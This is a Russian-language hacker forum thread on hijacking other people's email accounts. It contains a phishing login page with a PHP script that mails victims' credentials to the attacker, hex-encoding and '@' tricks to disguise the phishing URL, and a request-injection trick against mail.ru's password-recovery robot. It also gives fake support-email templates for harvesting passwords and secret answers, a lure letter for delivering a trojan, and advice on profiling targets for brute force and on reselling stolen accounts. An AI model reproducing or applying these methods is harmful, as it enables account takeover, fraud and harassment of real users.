Ну че? продолжим, а то Algol закрыл самую тусу, где больше всего постов. Я конечно малость переусердствовал ну..., а как без этого. Бывалый чел поймет меня. Так что продолжим тему в серьез, пока админы не обидятся на столь популярную тему.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Теперь я раскажу вам о самом простом методе взлома, расчитанный на лоха. Ведь так просто заИметь шестизначку, но так-же легко её потерять. Для начала нам нужно сохранить на харде страницу <span style='color:#00FF00'>ошибки</span>. Сами видете два поля ввода для <span style='color:#009900'>логин</span> и <span style='color:#009900'>пасс</span>. Нам нужно чтобы введя в эти поля данные пароль отсылался прямо к нам в руки. Теперь открываем её с помощью <span style='color:#009900'>html</span> редактора, лучше всего использовать <span style='color:#00FF00'>DreamweaverMX</span>, хотя можете сделать это обычным Notepad, Вот фрагмент скрипта: <span style='color:#0033FF'><table cellpadding=1 cellspacing=0 border=0> <form method="post" name="logon" action="http://mail.xakep.ru/cgi-bin/mail" onSubmit="Save();"> <tr> <td class=small align=right><b>eiaei</b></td> <td class=text><input type="text" name="username" size="8" style="width: 95px;"><input type="hidden" name="domain" value="xakep.ru"></td> <td class=text> @xakep.ru</td> <td>&nbsp;&nbsp;&nbsp;</td> <td class=small align=right><b>ia?ieu</b></td> <td class=text><input type="password" name="password" size="8" style="width: 95px;"></td> </tr></span> Нас интересуют только <span style='color:red'>action</span>, <span style='color:red'>username</span> и <span style='color:red'>password</span>. За что отвечают username и password на монятно. А в action нам следует указать путь к нашему <span style='color:#009900'>php скрипту</span>. Вот весь скрипт: <span style='color:#0033FF'><? mail("[email protected]", "Lost password", "$username\n $password " echo (" <META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://mail.xakep.ru/cgi-bin/mail?index=1\"> " ?></span> <span style='color:#009900'>Редирект</span> тоже играет важную функцию, и он обязательно должен указывать на страницку ошибки, чтоб не возникало подозрений. Вроде у нас все настроено, осталось провести тест, посмотри на мой <span style='color:#00FF00'>пример</span>. Для танкистов: <span style='color:#CCFFFF'>нам нужен хост с поддержкой php</span>. Из бесплатных нам подойдет <span style='color:#00FF00'>Holm</span>. Кажись вы не довольны тем что <span style='color:#009900'>url</span> у вас получился типа <span style='color:#009900'>http://antilamer.h1.ru</span>. И возникает вопрос, как бы все это затарить. Я предлагаю вам хотя бы кодировать в <span style='color:#00FF00'>hex</span>. И мы можем превратить наше www.antilamer.h1.ru в <span style='color:#009900'>%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%72%75</span>. Можно перед hex кодом добавить еще www.xakep.ru@. Выглядеть это будет так: <span style='color:#009900'>http://xakep.ru@%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%72%75</span> Удачного хака.[/QUOTE]<span id='postcolor'> Я написал такую статью, но на неё мало кто отреагировал, хотя..., самый действенный метод. В отличии от моей ловушки в которую мог попасть случайный прохожий, в этом методе можно направить свою атаку на определённого человека. Самое главное убедить его в необходимости залогиниться с нашей страницы. Методов моря, хоть мыльте от SUPPORT'а или как фантазия позволит. Я свою жертву в Инет-Клубе сам заставил залогиниться, набрал адрес своей страницы, и предложил ему проверить свою почту. Благо мест в зале небыло..., а я такой добрый.
Способ отличный, им можно взломать не только мыло. Можно сделать такую же страницу провайдера и сказать юзверю что это быстрый способ проверить личный кабинет, например, на РОЛе. Неплолхо бы эту статью поместить в мой топик про халявный инет.
Вот вам тестовая страница Пароль и логин отсылаются на мыло: [email protected] pass: antichat Проведите тест и сами убедитесь.
Да...ничё так способ.Только на лохов из чата расчитан.Надо топик открыть по всем таким способам,ну типа этго или с так называемыми email-роботами RedX'a
На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий. Тут все просто. По адресу [email protected] сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ) Итак, мы хотим обломать [email protected] Наш ящик [email protected] пароль qwerty Пишем письмо роботу на [email protected] Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer= Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - [email protected] : login=vasya_pupkin&pass=&answer= А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные! login=hacker&pass=qwerty&answer= Итого : тема сообщения выглядит вот так : login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer= Все, ждите пасс на ваше мыло!!!
RedX, я тут за не имением времени не вник в твою мессагу. А не проще использовать баг IE к подменным ссылкам? А еще лучше все это совместить...
Здрась-те у меня тут пара вопросов о Брутфорсе: 1 можно-ли задать настройки чтоб перебор начинался не с начала а скажем с 6 знака? 2 можно ли сохранить работу перебора чтоб после перезагрузке заного не начинать?
хех... vetal, не смеши народ)) говорят что действительно это кокдато работало, хотя я эти чудесные времена не застал.. но как бы там нибыло сейчас это нигде не сработает.. еслиб угнать мыло было так просто уже никтоб ими не пользовался, так как все бы уганяли их друг у друга по нескольео раз в день имхо
Солидарен с Че Гевара ты еще напиши про администрацию у которай полетела база и для ее востановления нужно прислать логин и пасс
Мальчики , кто сможет, бедной девушке,обьяснить как взломать ящик на яндексе. Ну прям сильно надо. Какой-нибудь ну-у самый простенький метод.Пожалуйста... Зарание благодарна.
Авотр статьи Thief копируй себе Привет тебе ... Сегодня мы ещё раз обсудим такой вопрос как увод мыла или почтового ящика... Я понимаю что ты уже видел сотни а мож и тысячи разных способов, но все они однобокие ... И вот я решил тебе поведать самые реальные способы... Сразу хочу сказать что один способ я взял из одного журнала(спец хакер - это не рекламная акция нах! ,конечно я его и так знал но там мне понравилось само описание... Мы выкинем из головы куки и скриптовые хитрости, и будем думать как можно увести мыло и как себя при этом вести ... Вообщем так когда я начитался кучу статей про увод мыла, у меня в голове отложилось только самое основное из 50 статей которые я прочитал с лёгкостью можно слепить одну нормальную , что я и собираюсь сделать. И так посмотрим как это все же работает .... Способ №1)Тебе непонравился какой то человечек в инете и ты подумал ему поднасрать.=)(правильно я бы зделал так же.Например у того человека который тебе не нравиться ник "LAMOZ".. С чего мы начинаем:мы открываем http://www.gogle.ru/ -именно его т.к. там собранно 5 поисковиков, это упростит твои поиски.Так вот набираем там LAMOZ и смотрим на инфу которую тебе выдал поисковик, смотри ка у твоего недруга есть сайтик ,пройдись по нему насри заоодно в гостевой и на форуме)) посмотри кто с ним корешиться и разговорись с его друганами, спроси где он живёт ,только таким образом что ты говориш мол .....:"ой блин а я совсем забыл у "LAMOZa" же завтра день ражденья ..." тебе говорят мол ты чё у него же **.**. ....и т.д. так вот..если ты обнаружел что у него на ящике стоит перессылка на другой (т.е. пароль может выслаться и на другой ящик указанный им ! То если ты увидешь в поисковике ещё одно мыло которое всеми внешними признаками будет указывать на этого LAMOZa ,то попробуй выслать пароль на него ,если получилось то попробуй ломануть этот ящик и т.д..Кстати если этот чел пользуется асей поищи и её в инете навярняка он оставлял кому нить в инете свой номер аси (например в гостевой) З.ы.Например я всегда пользуюсь первым способом он самый эффертивный поверь мне не смотря на его простоту и наивность этот способ может дать тебе очень много .... кстати в своей статье про конфинденциальность..я писал что после себя надо замести немного свои же следы например нашёл в поисковике много хрени про себя , но думаеш если кто увидет мне... ****** вот смотри почаще в поисковиках свой ник или асю или мыло! Способ №2)С.И. ---социальная инженерия или обратная соц. инженерия... С.И. основана на психологии естеснно , очень много полезной литературы можно найди именно по этому предмету, очень много книжек по психологии продаються на улице...почему бы не потренероваться в качестве психолога С.И. = ты входиш в контакт с жертвой естеснно она тебе не очень то и доверяет ,но ты должен расположить её к себе таким образом что бы она начала тебе доверять.....ну например сделать много приятных (намекающих на доверие к самой жертве) жестов например :дать пасс на фтп кого нить левого сайта на http://www.by.ru/ мелочь, но согласись если жертва увидит как ты ей доверяеш ,то несомненно с её стороны поступит такае же реакция это только дело времени..поверь мне или просто сказать мол давай встретимся забухаемсссс и всё такое (встречаться не обязательно ,но прикинь жертва будет рассуждать таким образом :мол...вот он типа не кинет он даже блин встретиться предлогал ! ,ну или например так ты залазиеш на другую асю и говориш ему всякие гадости ,после чего одновременно залазиеш на свою и спрашиваеш как у него дела ,он тебе ясное дело говорит что мол,......да вот блин придурок какой то заколебал ,и ты ему отвечаеш что ща я поправлю ситуацию.......и пи**еш асю у себя же и отдаёш её ему в качестве трафея прикинь он будет счастлив)) ,а если таких вот пустячков будет много ,много ,то и доверия к тебе очень повыситься 100%... О.С.И.---Обратная социальная инженерия основывается так же на психологии только в упрощённом ,а где то и в усложнённом варианте....да вот так Так вот осуществляеться она следующим способом: Я не буду углу***ться в подробности, а просто поясню что это за метод такой надеюсь что ты и сам всё поймёш если немного напрегёш свои мозги. У жертвы неожиданным образом должны появиться проблемы (например с пользаванием этого же ящика) ,и для помощи он ищет себе грамотного чела который во всем этом охрененно рулит ,так вот здесь ты и должен появиться и опять же психологией завладеть его мыльником!(понимаю сам способ не самый лёгкий ,но жертва сама тебя находит и подозрения что ты её обманешь у неё просто отпадёт! Способ №3)Письма.....,как много можно ими добиться (если конечно умееш красиво писать). Так вот суть этого способа заключается в том что ты должен написать (или найти в инете) письмо "красивого" содержания например такое Пример из журнала: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ From: [email protected] To: ламо@mail.ru (как вы поняли немного я изменил) Тема:Служба технической поддержки Mail.ru Уважаемый пользователь "ламо" ! От лица нашего интернет-холдинга Mail.ru мы приносим свои извинения за причинение вам некоторых неудобств. В связи со сменой нашего обарудования на более новое нам нужно перенести всю пользовательскую информацию на новые жёсткие диски. Соответсвенно просим повторно прислать некоторую информацию о своюм аккуанте. Это нужно для предотвращения всякого рода ошибок и неточностей.Просто пришлите по адресу [email protected] письмо с таким форматом: Login: Password: Password (ещё раз): Имя: Фамилия: Спасибо за помощь.Все эти временные неудобства только от того, что мы хотим увеличить качество и сороть работы с нашей почтовой системой. С уважением, администраторы интернет-холдинга Mail.ru @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Но как гласило в этом же журнале некоторае пользователи не хотят расставаться со своими паролями(мистика какая) Так вот обычному ,а может даже необычному юзерверю тяжело как то раставаться с со своим паролем на мыльник (может потому что этот самый пароль стоит на его асе или ещё где нить и он начинает АНАЛизировать правда всё это или просто какой то паренёк захотел поиметь его пасс) ,а вот с ответом на секретный вопрос расстаться гораздо проще ... Ещё один пример из журнала: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ From: Oldmail Password Support Serveice To: Много кому слалось... Тема: ВНИМАНИЕ! Проблемы с авторизацией на сервере "Старой почты" Уважаемый пользователь! В связи с переходом сервера на новое програмное обеспечение были открыты некие уязвимости в системе безопасности.Мы не можем точно сказать , были ли повреждены или несанкционно проситанны Ваши персональные файлы, поэтому просим Вас ответить на это письмо, по привёдённому ниже формату. ЕСли у Вас возникнут проблемы с написанием данного письма, ответьте на это письмо, указав в теме слово "help", и тогда наша служба вышлет Вам необходимые инструкции и форму для заполнения. ВНИМАНИЕ! Если от Вас не поступит ответа на это письмо, а почтовый траффик по Вашему пользователю будет поступать, Oldmail оставляет за собой право на отключение и удаление Вашей учётной записи. Для корректного ответа удалите все строки письма (включая эту) и запишите впервой строке ответ на Ваш секретный вопрос. Ваш вопрос: Ваше прозвище в школе? Спасибо за то, что пользуетесь услугами "Старой почты" @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Ещё раз процитирую журнал... Результативность такого письма пости 100% и может пригодиться не только на Oldmail, хотя некоторым приходилось высылать html форму для заполнения Так что надо запомнить правило как велел парень из журнала)) загрузить,припугнуть,показать авторитетность (видиш мол....я твой секретный вопрос знаю, значит я админ))).А узнать его может каждый! Способ №4)Троянчики -уменьшительно-ласкательное от слова троян Имеют такую хорошую (а для кого то плохую) отсылать все или почти все пароли тому от кого жертва получила этот самый троян (конечно же ты это всё знаеш !,но вот номально впарить его что бы жертва не о чём не подозревала и мало того что бы она с удовольствием и спешкой качала и запускала его получается не всегда=( Рассмотрим только один бустрый способ т.к. другие более длительные. Например ты знаеш что жертву точно не зовут Миша. Ты пишеш жертве письмо такого содержания: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Привет Михан ! Наконец то я добрался до этого инета ,а то тут эта ссесия роды пугают что в армию пойду короче головняки сам понимаеш слушай вообщем такая хрень ща твориться этот Dl4!0Hg написал наконец то эту чёртову прогу я ему отдал уже все 60$ за неё ,но ты мне должен теперь 30$ .Бля я ваще охренел прога на первый взгляд примитивная, но потом понимаеш что стоит больше ...надо быстрей юзать пока этот Dl4!0Hg не выложил её на каком нибудь хакерском сайте или форуме!!!Он мне сказал что в скором будущем так и поступит урод ***...прикинь друганам её уже раздал своим вот козёл! НУ лано короче ты позвони мне сегодня на сотовый ,а то у меня домашнему что то плохо)) Да кстати позвани Серёге он что то спрашивал на счёт футбола. Удачи я мож ещё до вечера вылезу в инет. @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ............................................................ Вот так вот не принуждённо на дружеских словечках ты впариваеш троянчика....... жертва думает вот парень ***анулся , а я у него на халяву ща эту прогу юзать буду хе хе хе лол Ну или ваще делаеш просто как сказал Zebax ломишся в асю парню и орёш ему вот короче Колян качай я скоро приду ***ин головняки короче через пару часов.....сам этим временем сидиш в инвизе и ждёш когда придёт на инет пейджер Способ №5) Брут....как хорошо когда ты потягиваеш пивко, а за тебя пароли подбирает прога (просто красота) ,но ты не должен просто скачать словарь и загнать его в прогу ты должен составить конкретный словарь к конкретному юзверю..... Смотри всю инфу про него вплоть то того сколько мигагерц у него в компе Короче соберю всю подноготину как в первом случае загани в текстовик скачай брут для мыльников кстати скачать можно прямо у нас (так же как и словари) и бруть в своё удовольствие ..... конечно говорить легче чем делать ,но всё равно удачи тебе Способ №6)Валим сервак......ну это ты как нить сам браток....,я что то спать хочу Как себя после этого (после того как ты ломанул мыло)вести?! 1)Некогда не меняй вопрос на чекретный ответ а вот сам ответ поменять не забудь 2)поменяй всю инфу о юзвере и запиши где то и старую и новую тобой введённую инфу 3)Не когда не офишируй что ты угнал мыльник тем более тому у кого ты его увёл!!!! сам подумай нужны ли тебе враги из за какого то иыла! 4)Лучше стуканись с какой нить аси и продай эти мыльники ему же ну или обменяй на что нить ,это намного полезней)
Многое понравилось, но: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Вообщем так когда я начитался кучу статей про увод мыла, у меня в голове отложилось только самое основное из 50 статей которые я прочитал с лёгкостью можно слепить одну нормальную , что я и собираюсь сделать. [/QUOTE]<span id='postcolor'> а получилась еще одна статья в дополнение к тем 50-ти. Способ №1 можно назвать "Сетевой шпионаж" Весьма забавно бывает этим заниматься) Где ссылку на гостевую нашел, где инфу из аськи позырил, где мыльцо на прослушку поставил, логины проанализировал и тд, вобщем - простор для творчества Насчет писем из службы поддержки - давным давно дохлый номер ИМХО. Даже если спрашивать секретный ответ. Лучше ненавязчиво так прислать анкету(типа за заполнение - приз. Приз, кстати должен соответсвовать увлечениям жертвы, например цифровой фотик, чтоб сразу отключить мозг), где среди прочих вопросов незаметненько так приютится вопрос, подразумевающий секретный ответ. Про брутус ты должен составить конкретный словарь к конкретному юзверю..... Это ясно как божий день, но по-моему нигде не упоминалось еще
